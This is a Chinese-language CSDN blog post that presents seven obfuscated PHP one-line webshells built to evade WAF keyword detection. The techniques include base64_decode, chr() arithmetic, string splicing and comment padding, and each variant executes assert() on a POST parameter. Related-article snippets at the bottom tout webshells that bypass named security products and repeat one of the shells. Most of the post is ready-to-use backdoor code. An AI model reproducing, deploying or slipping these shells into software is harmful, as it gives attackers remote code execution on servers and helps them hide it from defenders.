一句话木马WAF绕过

最新推荐文章于 2024-03-16 18:00:00 发布
最新推荐文章于 2024-03-16 18:00:00 发布
阅读量433 收藏 5
点赞数 2
文章标签: php python sql 列表
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39679797/article/details/120676030
版权

原理

WAF通常会以关键字判断是否为一句话木马,所以要将一句话木马变形使用,从而绕过 waf:

1.php变量函数

<?php 
        $a = "assert";
        $a($_POST['-7']);
    ?>

2.str_replace函数

<?php 
            $a = str_replace("b", "", "absbsbebrbt");//assert
            $a($_POST['-7']);
        ?>

3.base_64decode函数

<?php 
    $a = base64_decode("YXNzZXJ0");
    $a($_POST['-7']);
?>

4,使用“.”连接字符串

<?php 
            $b = "a"."ss";
            $c = "er"."t";
            $a = $b.$c;
            $a($_POST['-7']);
?>

5.pares_str函数

<?php 
            $str = "a=assert";
            parse_str($str);/parse_str("a=assert");
            $a($_POST['-7']);
        ?>

6.chr函数

<?php
$a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]);  
$b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]);
?>

7.使用注释

<?php 
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r"; 
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);
?>
LiujiaHuan13
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
php rce和绕过
m0_73973498的博客
10-08 1192
php?>是正和常情况下的标签,用于识别这是个php文件,但php也允许使用短标签和等价于
渗透干货|史上最全一句话木马
最新发布
2201_75362610的博客
03-16 1058
/可执行命令一句话密码-7ASPX一句话的 过安全狗效果不怎么样不过我认为能支持aspx 百分之8/90支持asp原来代码是 把标签修改替换下来 为execute request(“cmd”) 这样就避开了符号!表中数据段限制,一句话木马也写不下的情况网络中流传的最小的木马代码是 如过连这也写不下怎么办?
WAF绕过神器
12-14
顾名思义,铁鹰所创建的一款WAF绕过神器1.0版本。。。
php免杀大马一句话,过主流waf
06-20
PHP语言异常灵活,日站的时候经常被waf拦截,于是花了点时间弄了个免杀的PHP大马,减小了体积,测试安全狗云锁阿里云360主机卫士全都过。上传换点积分。没积分的在这儿下 https://pan.baidu.com/s/1dF5rfVF
PHP免殺一句話
01-20
免殺一句話 使用ascii算法 range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a [113]).chr($a[115]);
PHP木马入门指南:绕过WAF轻松入侵
鹅子鱼的博客:很菜但是很好学的小菜鸟
03-24 1021
一句话木马之后,演变一下,绕狗且不是轻轻松松
php一句话木马免杀
qq_58683895的博客
11-21 1169
利用php动态函数的特性,将危险函数拆分成字符,最终使用字符串拼接的方式,然后重新拼接,后加括号执行代码,并且可以使用花指令进行包装,如无限if(1=1)套接,以此来做伪装绕过,达成免杀
PHP一句话木马免杀
墨痕诉清风的博客
10-07 5337
目录 免杀小技巧 1.字符串拼接方式,构造敏感函数。 2.通过PHP的动态函数方法执行一句话。 3.利用php异或^构造字符串 免杀木马构造 一句话测试 异或转码数据 小结 免杀小技巧 1.字符串拼接方式,构造敏感函数。 <?php $a = 'ass'; $b = 'er'; $c = 't'; $d = $a.$b.$c; //assert 2.通过PHP的动态函数方法执行一句话。 <?php $a = 'assert'; $b = '_GET'; $a(.
一句话木马WAF(小宇特详解)
小宇的web博客
04-08 2287
webshell绕过WAF 常见的PHP一句话木马就是 <?php eval($_REQUEST['a'];)?> WAF的工作原理以正则匹配为主,这里尝试他到底是正则匹配了什么 这里首先尝试 <?php eval?> 发现没有拦截 然后尝试 <?php eval($_REQUEST[]);?> 发现拦截了,去掉中括号,发现不拦截了。 这里过滤了[] =>替换eval 替换$_REQUEST[a]=>超全局变量 这里利用了一个php函数end end函
php一句话木马变形技巧
热门推荐
bylfsj的博客
09-24 4万+
一、什么是一句话木马一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 二、我们如何发送命令,发送的命令如何执行? 我们可以通过 GET、POST、COOKIE这三种方式向一个网站提交数据,一句话木马用 $_GET[' ']、$_POST[' ']、$_COOKIE[' ...
waf是如何被绕过
12-30
介绍了白名单绕过、IP段白名单绕过绕过代理直接请求源站(代理模式云WAF)等绕过方式。适合初学者进行学习,不适合高手。
木马免杀只需要简单一句话的php
02-12
木马免杀只需要简单的一句话代码php文件就可以轻松过,可以参考
SQL注入中的WAF绕过技术
08-19
SQL注入中的WAF绕过技术,里面的思路很好,可以学习一下
那些年我们绕过WAF
05-07
本文主要是总结了WAF绕过的各种方法,大家在测试中可以使用以下的方法进行WAF绕过,希望对大家有帮助。
经过变异新的一句话(过360,安全狗)
weixin_30527323的博客
08-03 408
只测试了360网马查杀和安全狗网马查杀,均未被发现 <?php$a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]);$b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr...
一句话木马绕过检测的常见思路
si1ence的博客
09-07 1万+
0x0 背景 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用,居家生活搞站越货必备神器。主要总结一下常见的绕过安全检测的思路,欢迎各位大佬参与讨论。 0x1 关键函数编码 主要通过一些字符串对关键的几个函数比如eval、assert等函数进行变换绕过检测 如下代码使用\x65编码字符串’e’,使用array类型进行混淆: &lt;?php array_ma...
那些强悍的PHP一句话后门
weixin_34122810的博客
02-17 169
强悍的PHP一句话后门常用一:<?php $a=range(1,200);$b=chr($a[96-1+1]).chr($a[114-1+1]).chr($a[114-1+1]).chr($a[100-1+1]).chr($a[113-1+1]).chr($a[115-1+1]);$b(${chr($a[94]).chr($a[79]).chr($a[78]).chr...
php数组函数小结
weixin_33777877的博客
07-28 92
<?phpheader('content-type:text/html;charset=utf-8;');/*小结数组的使用*/#1.array():定义数组eg:$arr1=array('a','b','c','d');$arr3=array('c','d','e','f');$arr2=array('kA1'=>'v1','kA2'=>'v2','kA3...
waf绕过cookie
08-09
WAF绕过Cookie主要是通过修改请求方式或使用复参数绕过的方法。其中,修改请求方式是最常见且典型的绕过方式。在一些ASP或ASPx网站中,WAF可能对GET请求进行了过滤,但对Cookie甚至POST参数没有进行检测。因此,攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LiujiaHuan13

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值